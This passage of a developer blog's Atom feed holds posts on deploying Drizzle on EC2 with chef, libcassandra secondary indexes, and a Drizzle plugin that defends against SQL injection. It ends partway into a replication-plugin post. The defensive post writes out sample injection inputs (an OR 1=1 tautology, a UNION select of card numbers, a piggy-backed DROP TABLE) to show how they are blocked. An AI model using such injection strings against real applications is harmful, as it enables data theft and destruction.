<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
 
 <title>Padraig O'Sullivan</title>
 
 <updated>2011-04-11T16:09:13-07:00</updated>
 <id>http://posulliv.github.com/</id>
 <author>
   <name>Padraig O'Sullivan</name>
   <email>osullivan.padraig@gmail.com</email>
 </author>
 
 
 <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/posulliv" /><feedburner:info uri="posulliv" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry>
   <title>Deploy Drizzle on EC2 with chef</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/OPkZStTuWds/drizzle-chef.html" />
   <updated>2011-04-07T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2011/04/07/drizzle-chef</id>
   <content type="html">&lt;p&gt;
This post is a tutorial on how to deploy Drizzle on an EC2 instance using chef and the &lt;a href="http://www.opscode.com/platform/"&gt;Opscode Chef&lt;/a&gt; platform. The tutorial is specifically targetted at Ubuntu platforms. In particular, the procedures outlined here have only been tested on Ubuntu 10.04. It is expected however that the instructions here should apply on other Ubuntu versions with minimal modifications needed.
&lt;/p&gt;

&lt;h2&gt;The Opscode Platform&lt;/h2&gt;

&lt;p&gt;
In this article, we'll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to &lt;a href="https://community.opscode.com/users/new"&gt;sign up&lt;/a&gt; for a new account. Once you are signed up, the next step is to create a new organization. For this article, I'm going to create an organization named drizzle-test. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like (you should be able to click on the image to see a larger version):
&lt;/p&gt;

&lt;img src="../../../images/console_orgs.png" width=750 /&gt;

&lt;h2&gt;Configure AWS&lt;/h2&gt;

&lt;p&gt;
An assumption made in this article is that you have an &lt;a href="http://aws.amazon.com/"&gt;AWS&lt;/a&gt; account. If you don't, signing up is relatively straightforward.
&lt;/p&gt;

&lt;p&gt;
There are a few items that need to be configured for EC2 that we need to do to make our lives easier before starting with chef. Amazon blocks all incoming traffic to EC2 instances by default. SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and for this article, I want to permit traffic to the drizzle port (default drizzle port is 4427) as well. This is accomplished using the AWS console. We need to configure Security Groups. You can either create a new security group and modify the default security group. For this article, I'll create a new security group named drizzle and add the appropriate rules. After creating the group and adding the rules, the security group details should look like:
&lt;/p&gt;

&lt;img src="../../../images/security_group.png" width=750 /&gt;

&lt;p&gt;
I'll also create a new key pair in the AWS console specifically for this article. I'm going to give this key pair the name drizzle. After creating the key pair, I copy the downloaded private key to my SSH folder and update permissions on the key:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle.pem ~/.ssh/
chmod 600 ~/.ssh/drizzle.pem
&lt;/pre&gt;

&lt;h2&gt;Install chef&lt;/h2&gt;

&lt;p&gt;
To install chef on Ubuntu is quite straightforward. Opscode maintains an APT repository which I simply need to add to my sources list. In the file &lt;code&gt;/etc/apt/sources.list.d/opscode.list&lt;/code&gt;, add (and replace lucid with whatever release you are running):
&lt;/p&gt;

&lt;pre&gt;
deb http://apt.opscode.com/ lucid main
&lt;/pre&gt;

&lt;p&gt;
Next, I need to add the GPG key:
&lt;/p&gt;

&lt;pre&gt;
wget -qO - http://apt.opscode.com/packages@opscode.com.gpg.key | sudo apt-key add -
sudo apt-get update
&lt;/pre&gt;

&lt;p&gt;
To install chef, its as simple as installing the chef package:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install chef
&lt;/pre&gt;

&lt;p&gt;
When prompted for the server URL during this package installation, you can leave it blank. We will be configuring this later. You can also stop and disable the chef-client service now if you wish since we will only be using the &lt;code&gt;knife&lt;/code&gt; utility in this article. Finally, verify the version you have installed:
&lt;/p&gt;

&lt;pre&gt;
knife -v
&lt;/pre&gt;

&lt;p&gt;
For this article, the output of the above command needs to be a least 0.9.14
&lt;/p&gt;

&lt;p&gt;
Other packages required for this article are rubygems and git:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install rubygems git
&lt;/pre&gt;

&lt;p&gt;
Once rubygems is installed, there a few gems required for interacting with EC2:
&lt;/p&gt;

&lt;pre&gt;
sudo gem install net-ssh net-ssh-multi fog highline
&lt;/pre&gt;

&lt;h2&gt;Configure chef&lt;/h2&gt;

&lt;p&gt;
We are now all set to get started. The first thing to do is create a chef repository on your workstation. In this article, I will use git for this:
&lt;/p&gt;

&lt;pre&gt;
git clone https://github.com/opscode/chef-repo.git drizzle-chef-repo
&lt;/pre&gt;

&lt;p&gt;
Create a &lt;code&gt;.chef&lt;/code&gt; directory within this repository. This directory contains all the configuration files for &lt;b&gt;just this&lt;/b&gt; repository:
&lt;/p&gt;

&lt;pre&gt;
mkdir -p ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with Opscode platform. Keys are needed for both your user and organization on the Opscode Platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and you will a 'get private key' link on your account page:
&lt;/p&gt;

&lt;img src="../../../images/user_key.png" width=750 /&gt;

&lt;p&gt;
After Downloading this key, I need to place it in the configuration directory for the chef repository I am using here:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/posulliv.pem ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
For your organization, click on the 'Regenerate validation key' link and 'Generate knife config' link from the organizations over page as mentioned in the first section of this article. After clicking those 2 links, you will have 2 files: 1) drizzle-test-validator.pem and 2) knife.rb. Move these 2 files into the configuration directory for the chef repository being used for this article:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle-test-validator.pem ~/drizzle-chef-repo/.chef
mv ~/Downloads/knife.rb ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
From now on, whenever you are in the &lt;code&gt;drizzle-chef-repo&lt;/code&gt; directory, the &lt;code&gt;knife&lt;/code&gt; utility will connect to the Opscode Platform. To verify this, lets list out the current clients:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife client list
[
  "drizzle-test-validator"
]
posulliv@curragh:~/drizzle-chef-repo$
&lt;/pre&gt;

&lt;p&gt;
We need to tell &lt;code&gt;knife&lt;/code&gt; about our AWS credentials. This is done by adding the following 2 lines to your &lt;code&gt;knife.rb&lt;/code&gt; file in the &lt;code&gt;~/drizzle-chef-repo/.chef&lt;/code&gt; directory:
&lt;/p&gt;

&lt;pre&gt;
knife[:aws_access_key_id]     = "Your AWS Access Key"
knife[:aws_secret_access_key] = "Your AWS Secret Access Key"
&lt;/pre&gt;

&lt;p&gt;
After adding these credentials I should now be able to list all the EC2 instances associated with my AWS account:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Drizzle Cookbook&lt;/h2&gt;

&lt;p&gt;
chef should now be configured to work with your AWS account. The next step is to decide on what roles or recipes you want to apply to an instance you create. Since this article is on drizzle, I'll show how to bootstrap an EC2 instance with drizzle. I have developed a simple drizzle cookbook in a fork of Opscode's official cookbook repository that can be retrieved with git:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
rm -rf cookbooks
git clone git://github.com/posulliv/cookbooks.git
&lt;/pre&gt;

&lt;p&gt;
I have opened a pull request for this fork to get merged into Opscode's official repository. Hopefully, it will get merged in soon.
&lt;/p&gt;

&lt;p&gt;
Now we want to upload cookbooks to our chef server. The only cookbook I will upload in this article is the Drizzle cookbook:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
knife cookbook upload drizzle
&lt;/pre&gt;

It is simple to list the cookbooks that have been uploaded so far to your chef server:

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife cookbook list
[
  "drizzle"
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Create and Verify EC2 Instance&lt;/h2&gt;

&lt;p&gt;
We are now ready to create an EC2 instance and have it bootstrap itself and install the drizzle GA release! You will see a spew of output when you issue the command below (feel free to use any AMI image or flavor you wish, I just picked one):
&lt;/p&gt;

&lt;pre&gt;
knife ec2 server create "recipe[drizzle]" \
--image ami-2d4aa444 \
--flavor m1.small \
--groups drizzle \
--ssh-key drizzle \
--identity-file ~/.ssh/drizzle.pem \
--ssh-user ubuntu
&lt;/pre&gt;

&lt;p&gt;
To verify the server is created, first we check in the server list output from EC2:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
i-c03b5caf       50.17.153.76     10.202.253.78    m1.small         ami-2d4aa444     drizzle          running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
We should also verify that it is listed as a node:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife node list
[
  "i-c03b5caf"
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
Finally, if I log onto the EC2 instance I should be able to connect to drizzle:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~$ ssh -i ~/.ssh/drizzle.pem ubuntu@50.17.153.76
Linux ip-10-116-210-131 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 11 23:01:28 UTC 2011

  System load: 0.36             Memory usage: 13%   Processes:       55
  Usage of /:  8.6% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20110201.1'.
Last login: Mon Apr 11 22:27:04 2011 from 12.43.172.10
ubuntu@ip-10-116-210-131:~$ drizzle
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 9
Connection protocol: mysql
Server version: 2011.03.13 Ubuntu

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; 
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;
Hopefully, this tutorial proves useful. I hope to work more on the Drizzle cookbook in the near future and add support for the various plugin types present in Drizzle.
&lt;/p&gt;
</content>
 <feedburner:origLink>http://posulliv.github.com//2011/04/07/drizzle-chef.html</feedburner:origLink></entry>
 
 <entry>
   <title>Secondary Indexes with libcassandra in C++</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/fvZzi5gay10/libcassandra-sec-indexes.html" />
   <updated>2011-02-27T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2011/02/27/libcassandra-sec-indexes</id>
   <content type="html">&lt;p&gt;
Last weekend I updated my high-level C++ client for Cassandra, &lt;a href="https://github.com/posulliv/libcassandra/"&gt;libcassandra&lt;/a&gt; to support a lot of the new features in the 0.7 Cassandra release. In particular, one of the new features is secondary indexes and I wanted to very briefly outline how secondary indexes can be used programatically in libcassandra.
&lt;/p&gt;

&lt;p&gt;
An &lt;a href="http://www.datastax.com/dev/blog/whats-new-cassandra-07-secondary-indexes"&gt;article&lt;/a&gt; by Datastax gives a great overview of secondary indexes. I'm going to use the example in that article here.
&lt;/p&gt;

&lt;p&gt;
The first thing which we must do is create a keyspace and column family. This is accomplished in libcassandra like:
&lt;/p&gt;

&lt;script src="https://gist.github.com/846780.js"&gt;&lt;/script&gt;

&lt;p&gt;
After creating a keyspace and column family for working with, we next want to insert some sample data. I'll use the sample data inserted in the article but instead of inserting it through the CLI, I'll insert it using libcassandra:
&lt;/p&gt;

&lt;script src="https://gist.github.com/846777.js"&gt;&lt;/script&gt;

&lt;p&gt;
Next, to perform the same query as was used in the article, the code looks like:
&lt;/p&gt;

&lt;script src="https://gist.github.com/846782.js"&gt;&lt;/script&gt;

&lt;p&gt;
Currently, the result set is a &lt;code&gt;std::map&lt;/code&gt; of row keys to an inner &lt;code&gt;std::map&lt;/code&gt; of column names to column values. I plan on adding support for the result to contain more information about each row in the result set in the future.
&lt;/p&gt;

</content>
 <feedburner:origLink>http://posulliv.github.com//2011/02/27/libcassandra-sec-indexes.html</feedburner:origLink></entry>
 
 <entry>
   <title>SQL Injection Prevention in Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/gxodzuAe0C0/stad-plugin.html" />
   <updated>2010-12-05T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/12/05/stad-plugin</id>
   <content type="html">&lt;p&gt;
SQL injection attacks occur frequently nowadays. While attacks of this nature are completely avoidable when safe programming techniques are used, they still occur in practice. 
&lt;/p&gt;

&lt;p&gt;
With this in mind, I developed a plugin for Drizzle named STAD that utilizes the &lt;a href="http://posulliv.github.com/2010/03/01/query-rewrite.html"&gt;query rewriting plugin interface&lt;/a&gt; to prevent SQL injection attacks. The target use case for this plugin is a hosted environment where applications being developed are independent of the database layer i.e. a DBA can not control how a developer chooses to develop their application. Also, I mainly did this as a side-project to demonstrate a use-case for the query rewriting API.
&lt;/p&gt;

&lt;h2&gt;Overview&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism that applies the concept of instruction-set randomization to SQL: the SQL standard keywords are modified by appending a random key to them, one that an attacker cannot easily guess. Queries injected by an attacker into a randomized query will be caught since they will not contain the randomization key. The plugin will then just execute a harmless query (for now it is 'SELECT 1') instead of returning any error information to a potential attacker. The security of this approach is dependent on attackers not being able to discover the randomization key. If the key is exposed to an attacker, they will have the ability to inject SQL with the appropriate key appended to keywords.
&lt;/p&gt;

&lt;p&gt;
This solution was first developed in the research paper &lt;a href="http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.10.4549"&gt;'SQLrand: Preventing SQL Injection Attacks'&lt;/a&gt;. In their implementation of the idea, a proxy was developed that sat between the application and the database server. Thus, while it was a database independent solution, the overhead of the proxy layer and the introduction of a new component made it impractical.
&lt;/p&gt;

&lt;p&gt;
In drizzle, this funtionality is enabled through the query rewriting API. When the plugin is loaded and a randomization key is specified, all queries issued against the database must contain the correct randomization key or they will not execute correctly. A version of the drizzle command line client comes with the plugin that automatically appends the correct randomization key to SQL keywords. When the plugin is loaded and a randomization key is specified, an administrator is encouraged to use this version of the drizzle command line client.
&lt;/p&gt;

&lt;p&gt;
To get an idea of how the plugin works, I created a simple diagram to illustrate the steps involved in executing a query when the plugin is enabled. 
&lt;/p&gt;

&lt;img src="../../../images/stad_arch.jpg" width=750 /&gt;

&lt;p&gt;
In step (1) in the diagram above, a client driver (in this case ruby which I will link to later) establishes a connection with the server and asks the STAD plugin for the current randomization key. In step (2), this key is returned to the driver (right now it is transferred as plaintext) and stored there for the duration of the connection.
&lt;/p&gt;

&lt;p&gt;
In step (3), an application issues a query which goes through a client driver. This client driver randomizes the query using the randomization key obtained from the STAD plugin in step (2). It is this randomized query that is submitted to the server in step (4). Step (5) occurs before the query is parsed by the drizzle kernel. The STAD plugin de-randomizes the query and if all SQL keywords were randomized with the correct randomization key, it passes the correct query onto the drizzle query execution engine in step (6).
&lt;/p&gt;

&lt;p&gt;
Steps (7) and (8) are simply the returning of a result set to the client driver and application sitting above it.
&lt;/p&gt;

&lt;h2&gt;Attack Examples&lt;/h2&gt;

&lt;p&gt;
In the survey paper &lt;a href="http://www-rcf.usc.edu/~halfond/papers/halfond06issse.pdf"&gt;'A Classification of SQL Injection Attacks and Countermeasures'&lt;/a&gt;, the authors described a number of SQL injection attack types. I'm going to go through a few of these attack types and the examples from the paper and how the STAD plugin can prevent them. For the attack types and examples that go along with them, it assumed that the application is badly written and dynmically builds a SQL query based on user input without any validation of the input data. The query that will be constructed is:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='name' AND pass='pass' AND pin=pinno
&lt;/pre&gt;

&lt;p&gt;
The login, pass, and pin conditions in the WHERE clause are obtained from user input.
&lt;/p&gt;

&lt;h3&gt;Tautologies&lt;/h3&gt;

&lt;p&gt;
The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true. The consequences of this attack depend on how the results of the query are used within the application.
&lt;/p&gt;

&lt;p&gt;
This attack type has three main goals:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;identify injectable parameters&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='' OR 1=1 -- AND pass='' AND pin=
&lt;/pre&gt;

&lt;p&gt;
In this example, an attacker has injected a conditional (OR 1=1) that transforms the entire WHERE clause into a tautology and so every row in the users table will be returned.
&lt;/p&gt;

&lt;p&gt;
This attack would be prevented using our approach. Assume for a moment that the randomization key is the string '1234'. In this case, the query issued to the drizzle server would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
In this case, the query would not be de-randomized correctly. The STAD plugin would see that the OR keyword has not been randomized with the correct randomization key. Thus, the plugin would detect spurious input and never issue this query against the database.
&lt;/p&gt;

&lt;h3&gt;UNION Query&lt;/h3&gt;

&lt;p&gt;
In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
With this attack, an attacker can trick the application into returning data from a table different than the one intended by the developer. 
&lt;/p&gt;

&lt;p&gt;
For example, assume there is another table named creditcards in the same schema as the users table. In that case, an attacker could construct a query like:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND pass = '' AND pin=
&lt;/pre&gt;

&lt;p&gt;
The original query returns an empty set but the second query returns data from the creditcards table if the given account number exists. The result of this depends on the application but it is possible an attacker could exploit this.
&lt;/p&gt;

&lt;p&gt;
With our plugin, this query would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND1234 pass = '' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
As in the tautology attack, this query would never be issued since not all keywords in the query have been randomized with the correct randomization key.
&lt;/p&gt;

&lt;h3&gt;Piggy-Backed Queries&lt;/h3&gt;

&lt;p&gt;
Here, an attacker attempts to inject additional queries into the original query. In this case, an attacker is not trying to modify the original query; instead they are attempting to include new and distinct queries that "piggy-back" on the original query (think &lt;a href="http://xkcd.com/327/"&gt;little-bobby tables&lt;/a&gt;).
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;extract data&lt;/li&gt;
  &lt;li&gt;add or modify data&lt;/li&gt;
  &lt;li&gt;perform denial of service&lt;/li&gt;
  &lt;li&gt;execute remote commands&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
The database will receive multiple queries when an attack of this type is launched. If successful, an attacker could insert virtually any type of SQL command into the additional queries issued after the original query.
&lt;/p&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = 'bob' AND pass = ''; DROP TABLE users; -- ' AND pin = 1941;
&lt;/pre&gt;

&lt;p&gt;
The above attack has the DROP TABLE statement piggy-backed onto the original query. It would drop the users table. Our approach would prevent this plugin a similar way to the previous 2 attack types. The injectde commands would not have been radomized with the correct randomization key and so would be rejected by our plugin. In this case, the first query would be issued but the DROP TABLE statement would never be executed.
&lt;/p&gt;

&lt;h2&gt;Overheads of Our Approach&lt;/h2&gt;

&lt;p&gt;
One question that pops up when using a plugin like this would be what kind of overheads are associated with it. One experiment I performed to measure the overhead of the plugin was to use the oltp test in sysbench at various concurrency levels with the plugin both enabled and disabled. The results for this experiment are shown below:
&lt;/p&gt;

&lt;img src="../../../images/sysbench_raw_numbers.png" /&gt;

&lt;p&gt;
Its worth noting that this experiment was run on my local laptop so the actual transaction per second numbers are not interesting. All I'm looking to see is what kind of dip in transactions per second I see when the plugin is enabled. We can see that there is definitely a hit taken when the plugin is enabled with the reduction in transactions per second being about 10% across the board.
&lt;/p&gt;

&lt;h2&gt;Installation and Usage&lt;/h2&gt;

&lt;p&gt;
The &lt;a href="http://github.com/posulliv/stad"&gt;STAD plugin&lt;/a&gt; is maintained on github as a purely out-of-tree drizzle plugin. To download the source, either git or wget can be used:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/stad/tarball/master
git clone git://github.com/posulliv/stad.git
&lt;/pre&gt;

&lt;p&gt;
To build and install the plugin, the following is performed:
&lt;/p&gt;

&lt;pre&gt;
./config/autorun.sh
./configure --includedir=/path/to/drizzle/root/include --with-libdrizzle-prefix=/path/to/drizzle/root --prefix=/path/to/drizzle/root
make
make install
&lt;/pre&gt;

&lt;p&gt;
The above assumes you have drizzle installed somewhere on your system. You just need to point the configure script to that location so it can find the header files it needs.
&lt;/p&gt;

&lt;p&gt;
When starting the drizzled daemon, we need to inform it about the new plugin that we want to load since the plugin is not loaded by default. The extra parameter to pass to drizzled is --plugin-add (this loads the default list of plugins in addition to any plugins given as a parameter) so my drizzled command in my startup script looks like:
&lt;/p&gt;

&lt;pre&gt;
start_daemon -p "$PIDFILE" "$DAEMON --chuid $DRIZZLE_USER"  "--datadir=$DATADIR" "--plugin-add=stad"&gt; $LOG 2&gt;&amp;1 &amp;
&lt;/pre&gt;

&lt;p&gt;
To verify the plugin is loaded correctly, we can query the MODULES table in the DATA_DICTIONARY schema:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; select module_author, module_license, module_version
    -&gt; from data_dictionary.modules
    -&gt; where module_name = 'stad';
+----------------------+----------------+----------------+
| module_author        | module_license | module_version |
+----------------------+----------------+----------------+
| "Padraig O Sullivan" | GPL            | "0.2"          | 
+----------------------+----------------+----------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

&lt;p&gt;
Once the plugin is installed, we can use a ruby client for drizzle I've been working with in my spare time. This &lt;a href="http://github.com/posulliv/drizzle-ruby"&gt;ruby client&lt;/a&gt; is on github as well and it can either be retrieved using git or a tarball can be pulled:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/drizzle-ruby/tarball/master
git clone git://github.com/posulliv/drizzle-ruby.git
&lt;/pre&gt;

&lt;p&gt;
Then to install the client, its simply:
&lt;/p&gt;

&lt;pre&gt;
sudo rake install
&lt;/pre&gt;

&lt;p&gt;
Once the ruby client is installed, we can begin to use it in an application. A simple example of using it is:
&lt;/p&gt;

&lt;script src="http://gist.github.com/717571.js"&gt;&lt;/script&gt;

&lt;p&gt;
The above does nothing interesting but highlights a few interesting points. The client decides whether or not to use SQL randomization for a query based on the connection options given when creating a new connection to the database. Creating the connection object in the example above corresponds directly to steps (1) and (2) in the overview diagram we gave at the beginning of this article. 
&lt;/p&gt;

&lt;p&gt;
To issue a query that will be randomized, we must first specify a randomization key to the STAD plugin. Right now, this is done using a global variable so anyone who can connect to your drizzle database and view global variables can see what randomization key is being used. To set the randomization key to '1234', its simply:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; set global stad_key = '1234';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
After setting the randomization key, every query that issued against the database will now need to be randomized. This obviously becomes a problem if you need to issue queries through the command line client! The solution I use for now is to provide a version of the drizzle CLI named stadclient that takes the randomization key as a parameter. This binary will be installed in the bin directory under your drizzle root when you install the STAD plugin. We invoke it and can issue regular queries again through the CLI:
&lt;/p&gt;

&lt;pre&gt;
$ stadclient -k 1234

drizzle&gt; select * from data_dictionary.global_variables where variable_name = 'stad_key'; 
+---------------+----------------+
| VARIABLE_NAME | VARIABLE_VALUE |
+---------------+----------------+
| stad_key      | 1234           | 
+---------------+----------------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
Getting back to the ruby client, queries are issued against drizzle and randomized automatically by the ruby client. The code to issue a query against the server is:
&lt;/p&gt;

&lt;script src="http://gist.github.com/727914.js"&gt;&lt;/script&gt;

&lt;p&gt;
Line 11 in the above code encapsulates steps (3) through (7) in the overview diagram at the beginning of this article. Line 12 actually returns the results to the application and corresponds to step (8) in the diagram.
&lt;/p&gt;

&lt;h2&gt;Conclusions&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism against SQL injection attacks. It has relatively low overheads and when used through the ruby client interface I developed, it becomes quite simple to use in a client application with minimal modification. Of course, SQL injection attacks are completely preventable using good programming practices but I believe this plugin provides an extra layer of security in environments where a DBA cannot control how a developer chooses to sanitize their input.
&lt;/p&gt;
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/12/05/stad-plugin.html</feedburner:origLink></entry>
 
 <entry>
   <title>Drupal 7 with Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/vxGy0uTjtxs/drizzle-drupal.html" />
   <updated>2010-07-12T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2010/07/12/drizzle-drupal</id>
   <content type="html">I wrote an &lt;a href="http://akiban.com/blog/2010/07/12/running-drupal-7-with-drizzle/"&gt;article&lt;/a&gt; on the company
blog today about how to configure the latest Drupal 7 alpha release to work with Drizzle as the backend database.
&lt;br&gt;&lt;br&gt;

Feel free to check it out if you are interested.

</content>
 <feedburner:origLink>http://posulliv.github.com//2010/07/12/drizzle-drupal.html</feedburner:origLink></entry>
 
 <entry>
   <title>Simple Drizzle Replication Plugin for Cassandra</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/8Ixjh_zIcmw/replication-plugins.html" />
   <updated>2010-06-01T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2010/06/01/replication-plugins</id>
   <content type="html">This week, I'm giving a talk at &lt;a href="http://opensourcebridge.org"&gt;Open Source Bridge&lt;/a&gt; in Portland on 
developing replication plugins for Drizzle. This talk will be based on the &lt;a href=""&gt;tutorial&lt;/a&gt; that
&lt;a href="http://joinfu.com"&gt;Jay&lt;/a&gt; and I gave at the MySQL User's Conference this year. What I want to
cover in this article is the process of creating a simple replication plugin that simply applies the 
replication events that occur in Drizzle to &lt;a href="http://cassandra.apache.org/"&gt;Cassandra&lt;/a&gt;.
&lt;br&gt;

Lots of the material in this article is directly due to input from Jay and in particular from
the &lt;a href="http://joinfu.com/presentations/drizzle-replication-plugins/drizzle-replication-plugins.pdf/"&gt;presentation&lt;/a&gt; 
Jay put together for our tutorial in April.
&lt;br&gt;

&lt;h2&gt;Drizzle Architecture &amp; Replication Basics&lt;/h2&gt;

As is pretty well known at this stage, Drizzle follows a micro-kernel design. Essentially, this means that
most features are built as plugins. For example, in Drizzle, authentication, logging, storage engines, etc.
are provided as plugins. The kernel is meant to be extremely small in size and provides the basic 
functionality a database server requires such as a parser, query optimizer, and query executor.
&lt;br&gt;

Replication in Drizzle is entirely row-based with the kernel being the marshall of all sources and targets of 
replicated data. The kernel constructs objects that represent changes made in the server. The objects 
constructed are of type &lt;code&gt;message::Transaction&lt;/code&gt; and the kernel pushes these constructed objects
out to replication streams (a replication stream in Drizzle is a pairing of a replicator and an
applier).
&lt;br&gt;

The Transaction message in Drizzle is the basic unit of work in the replication system which represents a
set of changes that were made. We use &lt;a href="http://code.google.com/p/protobuf/"&gt;Google Protocol
Buffers&lt;/a&gt; for representing these messages. The GPB definition for the Transaction message is contained
within the &lt;code&gt;drizzled/message/transaction.proto&lt;/code&gt; file within the Drizzle source tree. Jay has
&lt;a href="http://www.joinfu.com/2009/10/drizzle-replication-changes-in-api-to-support-group-commit/"&gt;
